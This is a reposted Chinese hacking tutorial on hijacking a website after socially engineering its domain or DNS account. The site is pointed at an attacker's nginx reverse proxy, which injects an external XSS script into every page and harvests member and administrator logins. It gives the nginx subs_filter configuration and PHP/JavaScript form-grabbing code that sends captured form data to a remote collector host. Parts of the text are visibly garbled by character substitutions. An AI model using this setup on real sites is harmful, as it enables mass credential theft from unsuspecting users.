如果我们运气好社工到了域名密码能否做一个类似CND加速代理的东西,把域名解析到我们自己的做事器,然后在我们自己做事器上监控数据截取后台地址及密码等敏感信息。
答案肯定是可以的,而且nginx反代是最方便的玩法,但仅仅获取管理密码,会不会太无聊了?
脱裤理论上也是可以的~
这样纵然拿不到做事器权限,也可以危害到数据库。
思路大概是这样:
获取到域名或dns权限-配置cname 或者a解析到自己的反代做事器-反代替换所有数据包加入xss代码-获取到登录表单
0x01 nginx反代配置
更换包内容可以用ngx_http_subs_filter_module来办理,效果都是差不多的。
详细的安装过程和普通的三方模块一样
不会的可以参考:http://www.cnblogs.com/dudu/p/nginx-subs_filter.html
安装过程不再赘述
配置
新建一个站点的配置文件,
在/etc/nginx/nginx.config中配置subs_filter
如下内容
server
{
listen 80;
server_name www.反代做事器.com;
location / {
proxy_pass http://www.目标做事器.cn;
proxy_redirect off;
proxy_cache nuget-cache;
proxy_cache_valid 168h;
proxy_ignore_headers Set-Cookie Cache-Control;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
subs_filter 11001072 123456789;
index index.html index.htm index.php;
}
}
这里的subs_filter 11001072是网站上须要更换的代码, 123456789是你想更换上去的内容
一样平常就更换</body>到<script src=http://xss.net/xss></script></body>
重启nginx做事
systemctl restart nginx
其余 配置文件里有一个 sub_filter_once on | off;
是掌握更换次数的 on就会更换一次 off就全部更换 看详细情形而定
0x02 xss代码配置
这里须要用到xss的表单挟制,一样平常用xss.js就够了。
百度到的xss平台一样平常都有这个模块,http://webxss.net/ 比如这个。。
或者用一些第三方模块:
<?php /
@desc 转发文件
@team C0dePlay Team
@author Yaseng WwW.Yaseng.Me [Yaseng@UAUC.NET]
/ ini_set('display_errors', 'Off'); $id=$_GET['id']; if($_GET['y']){ $funcname=$_GET['funcname'];
$formname='\"大众'.$_GET['formname'].'\"大众'; $formid='\"大众'.$_GET['formid'].'\"大众'; echo \公众
var xurl='http://xxx.sinaapp.com/xxxxx/xform.php?id={$id}';
var form= ( $formname ) ? document.forms[$formname] : document.getElementById($formid);
\公众; if($funcname){ echo 'function getForm(e){var t,n=\"大众\公众,r=\"大众\"大众,i,s;for(t=0;t<e.length;t++){i=e[t];
if(i.name!=\"大众\公众){if(i.type==\"大众select-one\"大众)s=i.options[i.selectedIndex].value;else if(i.type==\"大众checkbox\"大众
||i.type==\"大众radio\"大众){if(i.checked==0)continue;s=i.value}else{if(i.type==\"大众button\"大众||i.type==\"大众submit\公众
||i.type==\"大众reset\公众||i.type==\公众image\"大众)continue;s=i.value}s=encodeURIComponent(s),n+=r+i.name+\"大众=\公众+s,r=\"大众&\公众}}return n} '.\"大众
$funcname=xss.proxy($funcname,function(){
xss.ajax(xurl,getForm(form));
})\"大众 ;
}else{ echo 'xss.xform(form,xurl);';
}
}else{ $url=$_SERVER['HTTP_REFERER']; $data=\"大众\"大众; foreach($_REQUEST as $k=>$v){ $data.=\"大众|$k=$v\"大众;
}
file_get_contents(\公众http://xxx.sinaapp.com/index.php?do=api&id={$id}&data={$data}&url={$url}\"大众);
} ?>
都可以实现。
0x03 末了
都配置ok之后,再打开目标站的就会自动被解析到我们的反代做事器,然后会员、管理员登录信息就都会被获取到xss平台,可以实现类似脱裤的效果。
转载自:TOOLS